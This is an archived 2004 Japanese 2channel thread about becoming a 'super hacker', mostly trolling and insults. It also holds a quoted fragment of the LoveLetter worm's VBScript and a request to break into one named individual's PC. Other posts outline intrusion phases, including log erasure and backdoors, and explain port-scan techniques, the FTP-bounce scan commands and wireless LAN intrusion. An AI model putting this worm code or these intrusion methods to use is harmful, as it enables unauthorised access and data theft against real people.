【本当に】スパーハカーへの道のり【真剣です】
■ このスレッドは過去ログ倉庫に格納されています
0001よちよちハカー
04/06/18 14:49ID:???文句のある方は>>2に言ってくださいね。
0144名無しさん ◆eRP3DPXYGc
04/07/01 07:56ID:fins3lLg学校が可哀相です。
>>143
ネタだと思うのなら思っていてくれて結構です。
自分よりも僕が優れていることを認めたくないとしか思えません。
幼稚な方ですね。
この板と関係ありそうな本しか挙げてないしな。
何気に2chとかクラッキングハウツーとか挙げてるのは笑った。
んなもの参考になってるってレベルの奴はただの厨房ww
まあお前実際に日本語も不自由だしな。
「馬の耳に念仏」の次は「モロヘイヤ」かw
0148y0suke
04/07/01 16:33ID:???>>22
良く分かりませんがウイルス界におけるビルゲイツ並の存在になったらスパーハカーだと思います。
違うべ。受け売りだけど、
自分がスパーハカーだと信じる 人 達 から、「お前スパーハカーだな」って言われたら、スパーハカーなんですよ
それまでは、ハカーですらなbュ、ハカー小僧だと 思います。
名無しに戻りますね
0149名無しさん ◆eRP3DPXYGc
04/07/01 17:24ID:fins3lLgそれは僕からの受け売りですね。
>>146
ネタをネタと受け取れないような人はここに来なくて良いです。
本気で「馬の耳に念仏」をあんな用法で使ったと思ってるんですか?
>>147
過去の固定を真似てるのは他の人だと思うのですが。
もう反論しなくていいよ、「馬の耳に念仏」だろうからw
0151
04/07/01 18:30ID:eZlw5C+cTELNETでアタック
これって只のサーバーテストなんだけど
Starsuiteを日本で委託販売してるのはソースネクストだったよなw
それを配ってるのかよww
割れ厨一人タイーホですか?ww
0153
04/07/01 18:46ID:eZlw5C+c0154sage
04/07/01 18:47ID:???>>148
それは僕からの受け売りですね。
今俺の脳内スパコンが404を弾き出しましたよ??
具体的にどういう名前の書籍か教えてほしい。
参考にしたいから
0157○
04/07/01 19:20ID:HSaZlOcU0158名無しさん ◆eRP3DPXYGc
04/07/01 19:38ID:fins3lLgサイトライセンスって言うものも知らないんですか?
>>154
前スレで僕がそのようなことを言いました。
>>155
参考にした書籍なので覚えてません。
あんまりいじめないでください。
>>157
動物本は良い本と言われてますね。
英語なのは読めませんが。
0159__
04/07/01 20:26ID:???http://www.1point.jp/~book_2ch/index.html
0162__
04/07/01 22:31ID:???散々言ってきただろうに…。
PC-UNIX入れてC言語勉強してカーネル等のバッファーオーバーフローを探す。
何一つやろうとしないで何を言っているのかよく分からん。
ツールや既に発見されたバグ付くのは厨房でもできる。
スパーハカーになりたいなら一つ一つクリアしていくしかないと思うよ。
がんばれ。
っていうかあまり人の事言える立場でもないが…。
知識がある
知識があって知的好奇心がある
知識があって知的好奇心があって探求心がある
知識があって知的好奇心があって探求心があって自主的な思考力がある
君は今までのレスから、どれに当てはまるかな?
0164157
04/07/01 22:51ID:???0165__
04/07/01 22:55ID:???オライリーと一言で言われてもいろんな本が出てるでしょ?
まず何をやりたいのか、どれ位のレベルの人なのかも分からないので >>159の
中から自分にあった本を探して欲しい。
ああ。
0168名無しさん ◆eRP3DPXYGc
04/07/01 23:38ID:fins3lLg>PC-UNIX入れてC言語勉強してカーネル等のバッファーオーバーフローを探す
いれました。
勉強しました。
でもみつかりませんでした。
0169__
04/07/02 00:01ID:???そう簡単にはいかないと思うよ。
そこがUNYUNさんがみんなに尊敬されてる理由だと思う。
そういえば R00t Zer0さんってどこに行ったんだろう???
0170名無しさん ◆eRP3DPXYGc
04/07/02 00:10ID:0oLRponSUNYUNって尊敬されてましたか?
そんな話は聞いたこと無いんですが。
0172__
04/07/02 00:40ID:???これ以上の話は
A.D.200X@Random (16)
http://pc5.2ch.net/test/read.cgi/sec/1079798496/
【kero】ヤフーBB顧客情報流出【かえる】
http://pc5.2ch.net/test/read.cgi/sec/1086097151/
が適切かも…。
0173名無しさん
04/07/02 20:55ID:???無料でインターネット
ホットスポットを使えば無料でインターネットができる。
企業ハック
企業等でも無線LANが増えてきたので無線LANカードを挿してノートパソコン
を持って移動すると企業のLANにも入れるかも…。
インターネットも出来て共有ファイルも頂けちゃうかもね。
0174名無しさん ◆eRP3DPXYGc
04/07/02 21:40ID:0oLRponSなにがしたいんですか?君は
悪いではなく、何がしたいのか聞いてる所がモエ
0176名無しさん ◆eRP3DPXYGc
04/07/02 23:56ID:0oLRponSオタクはキモいので秋葉原から出て来ないでください。
まあ、馬の耳に念仏でしょうが。
>何も書き込みがなくなってしまったようなので話題を・・・。
馬鹿の相手も飽きたと思われ。
0178名無しさん ◆eRP3DPXYGc
04/07/03 17:25ID:dIlUWfcI馬鹿馬鹿と人のこと言いますけどここの住人が煽るだけでちゃんとしたハッキングの話ができないだけだと思います。
次スレは他の板にたてるしかありませんね。
話ができないだけだと思います。
次スレはPC初心者板に
【教えて】スパーハカーになりたいのですが…【構って】で決定ですね。
0181名無しさん ◆eRP3DPXYGc
04/07/03 20:11ID:dIlUWfcI僕がいつ煽りましたか?
真面目にハッキングの話してない人にしか煽ったことはありません。
それに次スレはUNIX板にでもたてようかと思っています。
0183名無しさん ◆eRP3DPXYGc
04/07/03 22:59ID:dIlUWfcI今少し見て来ましたがLinux板はダメですね。
UNIX板もハカーになるために良い板だとは思えませんでしたけど。
0185(´;ω;`)
04/07/04 07:43ID:???散々低能ぶりを発揮しては主に論破されすごすご退散。
自身過剰もここまでくれば ネ申 だね。
よっぽどの自信が無い限り書き込むな、
見苦しい。
縦読みにしてはつまんねーな
まいどおなじみの自作自演だからな
◆eRP3DPXYGc は侵入には興味がなくて
ウイルスを作りたいってだけのことか?
例えばこんなのとか
-----------------------------------------------
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
-----------------------------------------------
0189名無しさん ◆eRP3DPXYGc
04/07/04 15:58ID:1SfTpu8Q国語勉強して来てください。
>>187
いつもアホな発言ご苦労さまであります。
ホントにこの板終ってますね。
悲しいです。
何ら思い入れはありませんが。
更に知識程度も知れている◆eRP3DPXYGcに何ら未練はありませんが。
未練がない割には未練がましくレスつけてるしな。
きっとみんな君を見てるよ。みんな生暖かく見守ってるに違いない。
◆eRP3DPXYGcという厨房を…
0192
04/07/04 17:13ID:hgBdoaNj少年四人のうちの一人が、知り合いの男性を監禁して殴るけるの暴行を加え
たとして、警視庁竹の塚署に逮捕監禁致傷の疑いで逮捕されていたことが
三日、分かった。
逮捕されたのは埼玉県八潮市、コンピューター会社アルバイト、神作譲容疑者
(三三)。
0193名無しさん ◆eRP3DPXYGc
04/07/04 17:24ID:1SfTpu8Qどれにも当てはまりません
>>191
何か意味とおってませんよ。
もういい加減煽るのはやめて本題にはいりましょう。
ハッキングのやり方教えてください。対象OSはwinXPです。1個人を狙っています。
IEにトロイやキーロガーで取得したデータを渡し、IE経由で自分のPCに流すとかは、無しで。
相手のパスやキーのログが欲しいです。 相手のCドライブ内のファイルも自由にダウソしたいです。
他言しません。解説サイトも教えてくれると嬉しいです。
0195スレジャック ◆KA7ddtB5Dw
04/07/04 23:28ID:???ハッキングの基本的な流れは次のようなものになります。
このハッキングでターゲットとなるのはUNIXやWindowsNT/2000/XPなどの
サーバーが対象となります。
各種OSによる具体的な方法は、この概念を理解してから読むと、
よく理解できることでしょう。
1:ターゲッティング
2:スキャン
3:間接的アタック
4:ローカルアタック
5:リモートアタック
6:ログ消去またはログ偽装
7:徘徊
8:タイムスタンプの改竄
9:バックドア
次回より、それぞれについて詳しく解説していきます。
よろしく頼むよ
0197名無しさん ◆eRP3DPXYGc
04/07/05 17:00ID:/4+taPtp次はまだですか?
なった昨今 Joeアカウントを探すのも大変だと思われ。
どうやってターゲットを探すのか興味津々。
0202名無しさん ◆eRP3DPXYGc
04/07/06 07:19ID:7yIvdzlp>>201
女の腐った奴と言われてもそれほど傷つきません。
男の腐った奴=201さんよりはましです。
0203
04/07/06 07:54ID:sCAOj2MJhttp://webnews.fc2web.com
0204かな
04/07/06 10:47ID:8omGNFrj自分でできなくて困ってます
ハカーの方よろしくお願いしますm(_ _)m
0205スレジャック ◆KA7ddtB5Dw
04/07/06 11:19ID:???このターゲッティングとはターゲットとなるサーバーを慎重に選び、
そのサーバーの情報を間接的に集めることです。
2:スキャン
スキャンと言っても様々なものが存在します。アタック方法として例えば、
Pingスイープ、ポートスキャン、 OS特定、アタックフィンガープリンティング、
ネットワークリソースの列挙、ユーザー・グループの列挙、アプリケーションバナー
の列挙などがあります。
これらのスキャンによってターゲットの弱点となるセキュリティホールを
探し出します。慎重な人はターゲッティングとスキャンでターゲットの情報を
先にしっかり集めてから行動します。
一方、Script Kiddiesは、現在、持っているExploitで効果があるかないかは別として
とりあえずアタックしておくという行動を取ります。もちろん失敗すればログが残って
しまいます。
0206名無しさん ◆eRP3DPXYGc
04/07/06 14:35ID:neamt6WVいろいろ詳しい方が来ましたね。
って僕が聞いているのはどうやってなるかなんですが許してあげましょう。
てか今気づいたんですがスレジャックって名前はよろしくないと思います。
よそでやる分には良いのですがここでは僕が唯一神なのでやめてください。
したがって、その名を改めないならば、唯一神又吉イエスが地獄の火の中に投げ込む者である。
やっぱり◆eRP3DPXYGcみたいな馬鹿の常駐するスレには馬鹿しかこないか…
ハックラ板の燃えカスここに消える
って◆eRP3DPXYGcはやっぱり多段じゃん。
天才の次は神かw
0208名無しさん ◆eRP3DPXYGc
04/07/06 14:47ID:neamt6WVどうせ出せないと思いますが。
akademeiaのサイトのコピペ乙
0210名無し@休憩中
04/07/06 21:47ID:???PS.仕事が終わらない・・・orz
0211名無しさん ◆eRP3DPXYGc
04/07/06 22:08ID:neamt6WVせめて仕事終えてから意見言ってください。
まともな人はそろそろ登場してください。
このスレも何もないまま終ってしまうととても悲しいです。
まず、ポートスキャンを行うには、相手を絞る必要があります。
この相手を絞るためのものはいくつかありますが、たとえば次のようなものです。
* 急激に人気の出たサイト
* 新規構築されたサイト
* 個人やSOHOなどで使用されやすい常時接続サイト
* ダイレクトメールなどの一覧から割り出したサイト
* ドメイン一覧の順
このように、ある程度対象を絞ります。
次に対象となるサイトがどのIPアドレスを使用しているかを調べます。
これは、ドメイン情報から簡単に確認することができます。
このツールは元々管理用として作成されたもので、Ping, TraceRoute, Whois, nslookup,
ポートスキャンなど、さまざまなチェックが可能です。
なお、テストはLAN内で行います。間違っても、外部のWebサーバーに行ってはいけません。
スキャン対象となるサイトのIPアドレスの範囲が割り出せると、
実際にどのIPアドレスにホストが接続されているかを調べる作業に入ります。
例えば、スキャン対象のサイトには192.168.0.1というIPアドレスが実際に使用されているとします。
それでは、このIPアドレス(192.168.0.1)に対してどのポートが
開いているかをポートスキャンによって確認してみます。
例えば、対象となるホストはポート 21,22,23,25,111 が空いているとします。
このポートに対して攻撃を行うことになります。
攻撃する側からは、 闇雲に攻撃を仕掛けるのでは時間と労力の無駄になります。
たとえば、存在しないホストに対して攻撃するほど無駄なことはないでしょう。
同様に、空いてもいないポートに対して攻撃を行っても大きな意味はありません。
ただし、ポートスキャンで空いていないポートにも攻撃を行うことは可能です。
空いていないポートが安全なのではなく、空いているより良いという程度に考えておくようにしてください。
TCPスキャン(TCP):
標的ポートに接続し、3wayハンドシェークと呼ばれるSYN-SYN/ACK-ACKのシーケンスを実行します。
被攻撃サイトにおいてスキャン行為の検出は容易。
SYNスキャン(TCP):
完全なTCP接続を行わないスキャン手法です。
ハーフオープンスキャンまたはステルススキャンと呼ばれています。 代わりに、SYNパケットを標的のポートに送信する。
・ 標的ポートからSYN/ACKを受信した場合のポートはリスン状態
・ 標的ポートからRST/ACKを受信した場合のポートは非リスン状態
FINスキャン(TCP):
標的にFINパケットを送信するスキャン手法です。
標的ホストは、RFC793に基づき、 クローズした全てのポートにRSTを送り返さなければなりません。
この手法は、UNIXのBSDソケットにしか通用しません。
クリスマスツリースキャン(TCP):
標的ポートに、FIN,URG,PUSHパケットを送信するスキャン手法です。
FINスキャン同様、標的ホストはクローズした全てのポートについて RSTを送り返さなければなりません。
NULLスキャン(TCP):
全てのフラグを"0"にするスキャン手法。
FINスキャン同様、標的ホストはクローズした全てのポートについて RSTを送り返さなければなりません。
UDPスキャン(TCP):
標的ポートにUDPパケットを送信。標的ポートが "ICMP port unreachable" というメッセージで応答した場合、
ポートはクローズされていることを確認するスキャン手法です。
パケットフィルタリングを施したデバイスに対するUDPスキャンは、 比較的時間がかかります。
また、UDPの性質上、ネットワーク越しにスキャンを行う場合の信頼性は非常に低くなります。
OSが特定されるとその攻撃方法の範囲が決まります。
以下で紹介するnmap は元々管理用として作成されたものであり、自組織内部で利用するものです。
管理用のツールによってポートがオープンされていなくてもOS特定が可能となります。
* FINプローブ
* 偽フラグプローブ
* ISN(Initial Sequece Number)サンプリング
* フラグメント処理
* 非フラグメントビット処理
* TCP初期ウィンドウサイズ
* ICMPエラーメッセージ抑制
* ICMPメッセージ引用
* ICMPエラーメッセージエコーインテグリティ
* TOS
* TCPオプション
サーバ側でポートスキャンの状況をロギングしにくい方法があります。
この方法の一つがAnonymous FTPを使用したポートスキャンです。
FTPは、コマンドとデータの通信では異なるポートを利用します。
これによって、ロギング上ではFTPの利用として見える訳なのです。
しかし、下記のように500番代のエラーを返すFTPサーバのソフトウェアを使用するか、
設定を加えることでFTPによるポートスキャンは回避することができます。
1. Anonymous FTPにtelnet(ポート21)で接続する。
2. ユーザ名anonymousでログイン。
user anonymous
3. パスワードとしてメールアドレスを入力します。
pass [email protected]
4. PORTコマンドでIPアドレスとポート番号を送ります。
port IPアドレス,ポート1,ポート2
ここで、500番台の数字が返された場合、 このAnonymous FTPサーバではポートスキャンを行うことができません。
5. もしPORTコマンドが利用可能であればLISTコマンドでファイルリストを取得
list
6. PORTコマンドの結果を確認
指定されたポートが開いているならば150が返され、 ポートが開いていないならば425が返されます。
425 Can't build data connection: Connection refused.
0217y0suke
04/07/07 06:45ID:???はいはい。
ステルススキャンされると分かっている場合、被スキャン対象になっている側はどういうツールを用いて
スキャンのログを収めるべきなのでしょうか?お勧めツールをいくつか紹介下さいな
0218名無しさん ◆eRP3DPXYGc
04/07/07 11:21ID:VDan9/qwいい加減こんな下らないことでスレ汚さないでください。
調子乗ってました。
シャワー浴びてウンコプールいって吊って来ます。
多段ちゃんは大学生になれたんだ。
で、大学生になってもやっぱり引き篭もりなの。
どうせ脳内設定だろうけど、
平日の講義が設定されてる時間に、
PCや携帯でインターネット使って2ちゃんねるにアクセスして即レス付ける馬鹿はいないよ。
講義中だしね。
誤魔化すなら、もう少し書き込み時間考えなきゃ、ね。
多段ちゃん大好きなあの板なら、誤魔化せるのかもしれないけど。
0221名無しさん ◆eRP3DPXYGc
04/07/07 12:21ID:VDan9/qwいまだに僕を多段だと想ってる人って脳内が単純で良いですね。
それに大学生で毎日学校良く奴なんていませんよサークル除けば。
高卒には分からないかも知れませんが
0222ぴよぴよハッカー
04/07/07 14:06ID:pxiqrtDS私はあうぽを使っています
ポートから進入された時のログ、
何か情報を引き出された場合のログはどうなりますか?
また、ポートから引き出す情報を具体的に教えてください。
うんこー
うんこー
0224名無しさん ◆eRP3DPXYGc
04/07/07 18:18ID:VDan9/qw真面目にしないと君達のお母さんにいって注意してもらうぞ。
0226ぴよぴよハッカー
04/07/07 19:00ID:???0227名前いれてちょ。。。
04/07/07 19:31ID:YtEH55DS講義でないで自分で勉強してるって事?
0228名無しさん ◆eRP3DPXYGc
04/07/07 19:40ID:VDan9/qwごめんなさい。
>>227
そういう教科もありますがそんな毎日授業なんて無いってことです。
それに全出席なんてみんながみんなしてるわけないじゃないですか。
小学校じゃあるまいし。
0229_
04/07/07 21:22ID:???まずスルーを覚えることを強くお勧めする
>212-216
自鯖のセキュリティチェックのやり方だよな?
常時上げカキする阿呆がいるから黙って頷いとけ
0230名無しさん ◆eRP3DPXYGc
04/07/09 03:45ID:QoMiAZTR構ってクンの巣窟になると言いますけど、スレが下がって消えてしまうことよりはましだと思っているだけです。
>スレが下がって消えてしまうことよりはまし
そんなことはない。
0233かなぶん
04/07/09 18:54ID:???02341000
04/07/09 22:54ID:???ありがとうございます。
天然じゃないんですね。残念。
こんなおかしな人みるの初めてなので前スレも読んでみようと
思ったんだけど・・・やめた。
0237名無しさん ◆eRP3DPXYGc
04/07/10 03:32ID:RoXjL03kいい加減そういう下らない議論は専用スレでも作って勝手にやっていてください。
0238__
04/07/10 03:53ID:???議論するにはテーマが必要だよ
何について議論するのさ?
「ハカーなるにはどうするか」はテーマにならないよ
(話題が出ても( ゚Д゚)イッテヨスィ発言を連発する◆eRP3DPXYGcからは
勉強する姿勢が感じ取れないから)
まずは何かテーマを絞って話し合い、深い知識を身につけるのがよさげ
しかし専用板に行った方が良かったりする罠
よってこのスレ 糸冬了
以降は ◆eRP3DPXYGc を徹底スルー進行でOK? >◆eRP3DPXYGc以外のミナサマへ
0239◇eRP3DPXYGc のファンの一人
04/07/10 15:52ID:0wdVQTuYお前がうざいです。他のスレでも立ててください。
釣るならもっとマトモに釣ってよ、我が物顔な2ちゃん中毒者にいがちですが
あなたが本当に2ちゃんの上級者なら、話を膨らます方向に持っていってください。
罠 とか
( ゚Д゚)イッテヨスィ とか
糸冬了 とか、見ていて恥ずかしい。女子高生じゃないんだから。
ところで、◆eRP3DPXYGc はあと何年時間の猶予があるの?勉強するのに
0240名無しさん ◆eRP3DPXYGc
04/07/10 19:40ID:k5iDF9BC留年しないかつ院に行かなければ今年度を抜くと3年は大学にいます。
擁護するのは結構ですが「2ちゃんの上級者」とか言っているのを見てると恥ずかしくなるのでやめてください。
0242名無しさん ◆eRP3DPXYGc
04/07/11 04:08ID:2rP+rWFg19歳ですが何か文句でも?
それに人にものを尋ねるときは自分から言いなさい。
ほんとに馬鹿ですね。
0243y0suke
04/07/11 10:21ID:???◆eRP3DPXYGcが興味を持ってる分野はどんな分野?
話をマジに進めるならそこをはっきりさせないと。
俺はDelphi・C・HTML周り・が得意っちゃぁ得意かも。
■ このスレッドは過去ログ倉庫に格納されています